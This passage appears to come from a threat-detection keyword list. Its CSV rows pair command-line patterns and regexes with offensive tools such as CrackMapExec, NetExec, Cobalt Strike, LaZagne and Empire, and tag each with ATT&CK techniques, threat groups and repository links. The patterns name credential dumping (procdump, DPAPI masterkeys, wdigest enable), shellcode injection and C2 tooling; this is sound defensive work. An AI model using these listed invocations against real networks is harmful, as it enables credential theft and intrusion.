*",".{0,1000}\s\-m\sprivileged\-users\s\-\-full\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M procdump ",".{0,1000}\s\-M\sprocdump\s","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -m rdrleakdiag -M masterkeys*",".{0,1000}\s\-m\srdrleakdiag\s\-M\smasterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "* -m run_command -c *.exe*",".{0,1000}\s\-m\srun_command\s\-c\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -M runasppl *",".{0,1000}\s\-M\srunasppl\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - 
TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M scuffy -o SERVER=127.0.0.1*",".{0,1000}\s\-M\sscuffy\s\-o\sSERVER\=127\.0\.0\.1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M scuffy*",".{0,1000}\s\-M\sscuffy.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M shadowcoerce *",".{0,1000}\s\-M\sshadowcoerce\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M 
shadowcoerce*",".{0,1000}\s\-M\sshadowcoerce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M shellcode_inject*",".{0,1000}\s\-M\sshellcode_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M slinky",".{0,1000}\s\-M\sslinky","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M slinky -o SERVER=*",".{0,1000}\s\-M\sslinky\s\-o\sSERVER\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M spider_plus *",".{0,1000}\s\-M\sspider_plus\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M spider_plus -o MAX_FILE_SIZE=100*",".{0,1000}\s\-M\sspider_plus\s\-o\sMAX_FILE_SIZE\=100.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M teams_localdb 
*",".{0,1000}\s\-M\steams_localdb\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M tokens*",".{0,1000}\s\-M\stokens.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M uac",".{0,1000}\s\-M\suac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -m venv csexec *",".{0,1000}\s\-m\svenv\scsexec\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -M wdigest -o ACTION=disable*",".{0,1000}\s\-M\swdigest\s\-o\sACTION\=disable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M wdigest -o ACTION=enable*",".{0,1000}\s\-M\swdigest\s\-o\sACTION\=enable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M web_delivery*",".{0,1000}\s\-M\sweb_delivery.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M zerologon *",".{0,1000}\s\-M\szerologon\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* m3-gen.py *",".{0,1000}\sm3\-gen\.py\s.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "* main.c log.c shelljack.c *",".{0,1000}\smain\.c\s\slog\.c\sshelljack\.c\s.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","0","N/A","9","1","50","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z" "* 
MakeMeEnterpriseAdmin.ps1",".{0,1000}\sMakeMeEnterpriseAdmin\.ps1","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* --maketoken --username * --password * --domain *",".{0,1000}\s\-\-maketoken\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-domain\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "* malleable.profile*",".{0,1000}\smalleable\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "* malleable-c2-randomizer*",".{0,1000}\smalleable\-c2\-randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* mask?a?a?a?a?*",".{0,1000}\smask\?a\?a\?a\?a\?.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --mask=?1?1?1* --min-len*",".{0,1000}\s\-\-mask\=\?1\?1\?1.{0,1000}\s\-\-min\-len.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --max-attack-time*",".{0,1000}\s\-\-max\-attack\-time.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "* maxdb-info.nse*",".{0,1000}\smaxdb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mcafee-epo-agent.nse*",".{0,1000}\smcafee\-epo\-agent\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -mdns y -mdnsunicast n*",".{0,1000}\s\-mdns\sy\s\-mdnsunicast\sn.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* -mDNSTTL *",".{0,1000}\s\-mDNSTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* membase-brute.nse*",".{0,1000}\smembase\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* membase-http-info.nse*",".{0,1000}\smembase\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* memcached-info.nse*",".{0,1000}\smemcached\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* memorpy *",".{0,1000}\smemorpy\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* memorydump.py*",".{0,1000}\smemorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "* memreader.c *",".{0,1000}\smemreader\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "* MemReader_BoF*",".{0,1000}\sMemReader_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "* merlin.dll*",".{0,1000}\smerlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "* merlin.py *",".{0,1000}\smerlin\.py\s.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "* 
met_inject*",".{0,1000}\smet_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* metasploit-info.nse*",".{0,1000}\smetasploit\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* metasploit-msgrpc-brute.nse*",".{0,1000}\smetasploit\-msgrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* metasploit-xmlrpc-brute.nse*",".{0,1000}\smetasploit\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
